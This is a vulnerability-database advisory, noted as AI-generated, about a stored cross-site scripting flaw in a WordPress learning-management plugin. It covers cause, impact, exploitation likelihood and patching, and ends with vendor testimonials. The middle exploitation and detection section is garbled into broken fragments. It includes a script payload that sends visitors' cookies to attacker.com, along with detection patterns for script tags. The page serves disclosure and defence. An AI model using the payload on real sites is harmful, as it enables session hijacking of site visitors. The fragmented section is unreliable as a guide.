
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-2714 is a Stored Cross-Site Scripting (XSS) vulnerability in the Institute Management – Learning Management System plugin for WordPress, affecting all versions up to and including 5.5. The flaw exists in the 'Enquiry Form Title' setting due to insufficient input sanitization and output escaping. It was published on April 22, 2026, and assigned by Wordfence. The vulnerability carries a CVSS v3.1 base score of 4.4 (Medium), and is limited in scope to multi-site WordPress installations and those where unfiltered_html has been disabled (GitHub Advisory, Wordfence).
The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation – Cross-site Scripting). The vulnerable code resides in admin/inc/wl_im_settings.php at line 47, where the 'Enquiry Form Title' setting value is stored without proper sanitization and later rendered without output escaping (GitHub Advisory, WordPress Trac). Exploitation requires an authenticated attacker with Administrator-level privileges or higher, and the attack is only viable in multi-site WordPress environments or where the unfiltered_html capability has been disabled — conditions that would otherwise prevent administrators from injecting raw HTML. No public proof-of-concept exploit code has been identified (Wordfence).
Successful exploitation allows an authenticated administrator to persistently inject arbitrary JavaScript into pages served to all subsequent visitors of the affected WordPress site. This stored XSS can be leveraged to steal session cookies, perform actions on behalf of other users (including privilege escalation in multi-site contexts), deface site content, or redirect users to malicious external sites. Availability is not impacted, but both confidentiality and integrity are affected at a low level due to the scoped nature of the attack (GitHub Advisory, Wordfence).
There is no known public proof-of-concept exploit and no evidence of active in-the-wild exploitation as of the time of publication (GitHub Advisory). The EPSS score is approximately 0.008–0.011%, placing it in the 2nd percentile for exploitation likelihood within 30 days. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation is further constrained by the requirement for high-privilege authenticated access and specific WordPress configuration conditions (Wordfence).
unfiltered_html disabled. Tools like WPScan can enumerate installed plugins and versions.<script>document.location='https://attacker.com/steal?c='+document.cookie</script> and save the settings.<script>, %3Cscript%3E, javascript:) in the stored value of the 'Enquiry Form Title' setting within the WordPress wp_options table.admin/inc/wl_im_settings.php in the Institute Management plugin directory, which could indicate tampering beyond the settings UI (Wordfence).Update the Institute Management plugin to a version higher than 5.5 as soon as a patched release becomes available; the GitHub Advisory (GHSA-4mj3-26h4-xjcm) confirms a patch exists (GitHub Advisory). As an interim measure, restrict Administrator-level access to trusted personnel only and audit existing plugin settings for any injected script content. Implementing Content Security Policy (CSP) headers on the WordPress site can serve as a defense-in-depth measure to limit the impact of any stored XSS. Sites not operating in multi-site mode and with unfiltered_html enabled are not affected by this specific vulnerability.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."